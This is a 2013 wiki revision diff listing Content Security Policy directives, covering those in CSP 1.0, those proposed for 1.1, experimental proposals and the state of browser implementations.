Content Security Policy: Difference between revisions
(19 intermediate revisions by 5 users not shown) | |||
Line 3: | Line 3: | ||
* Current [https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html editor's draft] | * Current [https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html editor's draft] | ||
* [http://www.w3.org/Security/wiki/Use_Cases_for_Content_Security_Policies Use Cases] | * [http://www.w3.org/Security/wiki/Use_Cases_for_Content_Security_Policies Use Cases] | ||
* [http://www.w3.org/Security/wiki/Test_Assertions_For_Content_Security_Policy Test Assertions] | |||
== Directives == | == Directives == | ||
Line 10: | Line 11: | ||
===Version 1.0=== | ===Version 1.0=== | ||
These directives are | These directives are included in CSP 1.0. | ||
* default-src | * default-src | ||
Line 22: | Line 23: | ||
* connect-src | * connect-src | ||
* report-uri | * report-uri | ||
* | * sandbox (optional) | ||
===Proposals for Version 1.1=== | ===Proposals for Version 1.1=== | ||
These directives have been proposed for inclusion in CSP 1.1: | |||
* | * <meta> tag [https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html#html-meta-element--experimental strawman spec] | ||
* | * More granular source expressions (file-level paths) [https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html#path-matching strawman spec] | ||
* A script interface for reading policy details: [https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html#script-interfaces--experimental strawman spec] | |||
* | * form-action (Restricts URLs that can be used as actions for forms) [https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html#form-action--experimental strawman spec] | ||
* | * script-nonce [https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html#script-nonce--experimental strawman spec] | ||
* plugin-types (Provides a whitelist of MIME types for plugins that can be instantiated on this page) [https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html#plugin-types--experimental strawman spec] | |||
* reflected-xss (Folds X-XSS-Protection into CSP) [https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html#reflected-xss--experimental strawman spec] | |||
* Using script-sample from Mozilla's original implementation in CSP reports (useful for false positive detection, provide signatures of payloads for WAFs, and generally more informative) | |||
* script- | * Some sort of DOM event (perhaps 'scriptpolicyviolation' triggered on 'document') | ||
* Restriction on cookie scope - [http://lists.w3.org/Archives/Public/public-webappsec/2013Sep/0021.html strawman spec] | |||
* plugin-types (Provides a whitelist of MIME types for plugins that can be instantiated on this page) | |||
* | |||
===Experimental=== | ===Experimental=== | ||
Line 50: | Line 47: | ||
If you're experimenting with a directive, please feel encouraged to list the directive here and link to a description. Listing your directive here is not a guantee that other folks won't appropriate its name for another purpose, but it certainly can help avoid that problem. | If you're experimenting with a directive, please feel encouraged to list the directive here and link to a description. Listing your directive here is not a guantee that other folks won't appropriate its name for another purpose, but it certainly can help avoid that problem. | ||
* allow-modification (Allows modification of the CSP policy while the page is running. See http://lists.w3.org/Archives/Public/public-webappsec/2011Dec/0008.html) | |||
* no-external-navigation (See http://lists.w3.org/Archives/Public/public-webappsec/2011Dec/0016.html) | |||
* no-mixed-content (A simplified directive for blocking mixed content; also includes all child frames.) | |||
* script-hash [contains a list of the digests of loadable scripts.] | |||
* no-user-js (Protect against self-xss) | |||
* Option to restrict script-src (or all directives?) to sources with specific content-types. | |||
* An option to allow seamless with parent? | |||
* jsonp-src and jsonp-sink | |||
* referrer (see http://wiki.whatwg.org/wiki/Meta_referrer ) | |||
* policy-uri | |||
* [https://wiki.mozilla.org/Security/CSP/Strawman This wiki page] contains a bunch of brainstorming that might lead to useful directive ideas | * [https://wiki.mozilla.org/Security/CSP/Strawman This wiki page] contains a bunch of brainstorming that might lead to useful directive ideas | ||
Latest revision as of 23:26, 30 September 2013
Content Security Policy
- Current editor's draft
- Use Cases
- Test Assertions
Directives
A Content-Security-Policy consists of a number of directives. This section lists the maturity level of the directives the working group is currently aware of.
Version 1.0
These directives are included in CSP 1.0.
- default-src
- script-src
- object-src
- img-src
- media-src
- style-src
- frame-src
- font-src
- connect-src
- report-uri
- sandbox (optional)
Proposals for Version 1.1
These directives have been proposed for inclusion in CSP 1.1:
- <meta> tag strawman spec
- More granular source expressions (file-level paths) strawman spec
- A script interface for reading policy details: strawman spec
- form-action (Restricts URLs that can be used as actions for forms) strawman spec
- script-nonce strawman spec
- plugin-types (Provides a whitelist of MIME types for plugins that can be instantiated on this page) strawman spec
- reflected-xss (Folds X-XSS-Protection into CSP) strawman spec
- Using script-sample from Mozilla's original implementation in CSP reports (useful for false positive detection, provide signatures of payloads for WAFs, and generally more informative)
- Some sort of DOM event (perhaps 'scriptpolicyviolation' triggered on 'document')
- Restriction on cookie scope - strawman spec
Experimental
Various folks are experimenting with these directives. If one of more of them prove useful, you can propose including them in a version of CSP by sending an email to public-webappsec. Historically, discussion of CSP has taken place at public-web-security and cross-posting is encouraged.
If you're experimenting with a directive, please feel encouraged to list the directive here and link to a description. Listing your directive here is not a guantee that other folks won't appropriate its name for another purpose, but it certainly can help avoid that problem.
- allow-modification (Allows modification of the CSP policy while the page is running. See http://lists.w3.org/Archives/Public/public-webappsec/2011Dec/0008.html)
- no-external-navigation (See http://lists.w3.org/Archives/Public/public-webappsec/2011Dec/0016.html)
- no-mixed-content (A simplified directive for blocking mixed content; also includes all child frames.)
- script-hash [contains a list of the digests of loadable scripts.]
- no-user-js (Protect against self-xss)
- Option to restrict script-src (or all directives?) to sources with specific content-types.
- An option to allow seamless with parent?
- jsonp-src and jsonp-sink
- referrer (see http://wiki.whatwg.org/wiki/Meta_referrer )
- policy-uri
- This wiki page contains a bunch of brainstorming that might lead to useful directive ideas
Implementations
- WebKit implementation is now (roughly) feature-complete; by Adam Barth 11-May-2011
- Firefox implementation is also (roughly) feature-complete
- Internet Explorer 10 Platform Preview has a partial implementation